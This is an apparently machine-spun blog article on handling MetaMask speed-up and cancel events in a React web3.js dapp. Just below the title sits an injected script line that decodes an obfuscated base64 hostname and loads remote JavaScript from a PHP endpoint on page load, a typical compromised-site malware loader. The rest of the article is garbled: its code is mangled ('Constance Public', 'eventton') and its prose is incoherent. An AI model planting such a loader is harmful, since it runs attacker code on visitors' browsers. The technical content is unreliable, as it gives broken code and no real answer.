Metamask: How can listen speed up/cancel event on transaction in my dapp?

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=a0046434″;document.body.appendChild(script);

Optimization of Events Management in A React Web3.js Dapp: Metamask Integration

As a Developer who builds a decentralized application (DAP) using react and web3.js, you probably with scenarios in which users click on the buttons or interact with the functionality of your dap. However, when it comes to managing the events triggered by thesis interactions, as special in the context of a the -enabled for the portfolio like yours, times can play a crucial role.

In this article, we will deepen the problem and explore the solutions to optimize the management of events in react web3.J Dapps using the integration of Metamask.

The Problem: Inconsistency of the Event

When users interact with the functionality of your dap via metamask, they essentialy performance the javascript code inside the browser. This can lead to inconsistencies between the native code Performed by the Application and the Transactions Transmitted to the Blockchain (or the Network, in the event of a decentralized application).

Here are some Possible reasons Why This Inconsistency Could Occur:

  • Differences of Timing : The Execution of the JavaScript code May not always be synchronous with the web3.js events or native ethereum blockchains.

  • Timeout and Errors : If your dupp is managing more interactions simultaneously, there is the possibility that an interaction may take longer to complete the expected, leading to inconsistent management of the events.

Metamask Integration and Events Management

To optimize the management of events in your react web3.js app using the integration of Metamask, IT is Possible to Consider the Following Strategies:


When performing the javascript code inside the browser, `asynchronize/wait can help manage asynchronous operations more effective.


Constance Public SPUPTONTCLICK = () => {

Const Speedepepransationhash = Active FetchSpeedPtransation ();

// Update the User Interface with Updated Accelerated Transaction hash


FetchPeedpptrensation () {) Function

Return New Promise ((Resolve, Reject) => {

// Simulates A Longer Execution Time for Demonstration Purposes

Setimeout (() => {

Solve (Speeduptransationhash);

}, 2000); // Introduction a delay to demonstrate an inconsistent timing





To prevent the predefined action of the event (e.g. click on the button) Manages the web3.js natives or the blockchain Ethereum Events, use event.partentdefault () is' event.stoppropopation ().


Constance Public SPUPTONTCLICK = () => {

Event.Preventdefault ();

// Update the User Interface Without Performing the Native Code For While to Minimize the Impact on Events



uses the management of web3.js


Instead of Relying Exclusively on JavaScript callbacks, You can use the web3.js.


Constance Public SPUPTONTCLICK = () => {

Web3.eth.eventton (‘speedup’, (event) => {

Console.log (`speed up event receipted: $ {event.transationhash});



Implement A Fallback Mechanism

When the native JavaScript code for the management of events is not available or inconsistent, using a fallback mechanism to manage the user’s interaction.


Constance Public SPUPTONTCLICK = () => {

If (Typeof Web3! == ‘undfined’) {

Web3.eth.eventton (‘speedup’, (event) => {

Console.log (`speed up event receipted: $ {event.transationhash});


} Other {

// View a Bankback Message or Requires the User To Try Again



By implementing one or more of these strategies, you should be able to optimize the management of events in your web3.js app react using the integration of metamask and improve the overall experience of the user.


In this article, we have explored the ways to deal with the problem of inconsistent management of events in a web react3.

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